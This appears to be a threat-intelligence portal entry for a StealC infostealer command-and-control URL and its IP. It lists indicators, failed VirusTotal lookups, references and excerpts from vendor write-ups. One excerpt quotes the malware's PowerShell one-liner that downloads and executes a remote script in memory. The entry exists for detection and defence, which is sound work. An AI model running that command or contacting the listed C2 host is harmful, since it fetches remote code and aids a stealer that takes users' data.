s2
--:--:--UTC

Searching APEX

Starting…

  1. Searching Threats, IOCs & Threat Intelligence locally
  2. Querying external providers
  3. Asking AI Forensic Validator
  4. Creating new entry from validated hit

0s elapsed

TF-1812015 high

📛 Threat Title

Stealc: URL that is used for botnet Command&control (C&C) http://31.76.251.143/0f1da281ab93408e9369.php

Category: Stealc Published: Source updated: First seen: Last updated: Source: Threatfox IOCs/Threats

Description

Indicator that identifies a botnet command&control server (C&C). IOC type: URL that is used for botnet Command&control (C&C). Attributed malware: Stealc. Confidence: 100. First seen: 2026-05-13 23:08:02 UTC. Last seen: 2026-05-14 11:10:33 UTC. Reporter: Bitsight. Tags: c2, Loader, Stealc, stealer, VOLK.

Indicators of Compromise (2)

Each indicator is enriched from the IOC database, threat-intel feed corroboration (Threat Hunt) and VirusTotal. Click one to expand.

ipv4 31.76.251.143 VT: VT base fetch failed: HTTPError: 429 Client Error: Too Many Requests for url: https://www.virustotal.com/api/v3/ip_addresses/31.76.251.143

IOC database

Type
ipv4
Value
31.76.251.143
First seen
Last seen
Attached to this threat
Appears in
2 threats
Description
Resolved from url http://31.76.251.143/0f1da281ab93408e9369.php

Open the full IOC page →

Threat Hunt — feed corroboration

Not present in any configured threat-intel feed.

Details From VirusTotal

VirusTotal: VT base fetch failed: HTTPError: 429 Client Error: Too Many Requests for url: https://www.virustotal.com/api/v3/ip_addresses/31.76.251.143

url http://31.76.251.143/0f1da281ab93408e9369.php

IOC database

Type
url
Value
http://31.76.251.143/0f1da281ab93408e9369.php
First seen
Last seen
Attached to this threat
Appears in
2 threats
Description
URL that is used for botnet Command&control (C&C) attributed to Stealc

Open the full IOC page →

Threat Hunt — feed corroboration

Not present in any configured threat-intel feed.

Details From VirusTotal

No VirusTotal details cached for this IOC. Open the IOC page to query VirusTotal.

References (2)

  • Malpedia profile Threatfox IOCs/Threats
  • ThreatFox IOC page Threatfox IOCs/Threats

    Indicator that identifies a botnet command&control server (C&C). IOC type: URL that is used for botnet Command&control (C&C). Attributed malware: Stealc. Confidence: 100. First seen: 2026-05-13 23:08:02 UTC. Last seen: 2026-05-14 04:09:39 UTC. Reporter: Bitsight. Tags: c2, Loader, Stealc, stealer, VOLK.

Remediations (8)

  • web:any.run

    Stealc is a stealer malware that targets victims' sensitive data, which it exfiltrates from browsers, messaging apps, and other software. The malware is equipped with advanced features, including fingerprinting, control panel, evasion mechanisms, string obfuscation, etc. Stealc establishes persistence and communicates with its C2 server ...

  • web:blog.lexfo.fr

    A command and control server A command and control server, also known as C2 or CnC (Command and Control), is a server belonging to a malicious actor, enabling them to collect and even interact with an agent (malware) installed on an infected workstation.

  • web:blog.sekoia.io

    In early February 2023, Sekoia.io identified a new malware family when tracking infrastructures distributing information stealers. The Command and Control (C2) communications of the associated samples share similarities with those of Vidar and Raccoon. Further analysis by Sekoia.io allowed us to associate this new malware family with Stealc .

  • web:cybersecuritynews.com

    For PowerShell script execution, StealC V2 utilizes a more direct approach with the command: powershell.exe -nop -c iex(New-Object Net.WebClient).DownloadString('[payload]'). This method allows the malware to execute remote scripts directly in memory without writing them to disk, making detection more challenging.

  • web:dailysecurityreview.com

    StealC malware receives major upgrade with advanced stealth, encryption, and data theft tools, including real-time Telegram alerts and full desktop screenshot capabilities.

  • web:hunt.io

    Stealc is a new information-stealing malware targeting sensitive data across various industries. Learn about its capabilities and mitigation strategies.

  • web:www.sonicwall.com

    The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth ...

  • web:www.zscaler.com

    Introduction StealC is a popular information stealer and malware downloader that has been sold since January 2023. In March 2025, StealC version 2 (V2) was introduced with key updates, including a streamlined command-and-control (C2) communication protocol and the addition of RC4 encryption (in the latest variants). The malware's payload delivery options have been expanded to include ...

AI Forensic Analysis

Only Available for Registered Users. Sign in to view.

VirusTotal Information

loading…

IP Geolocation

Loading…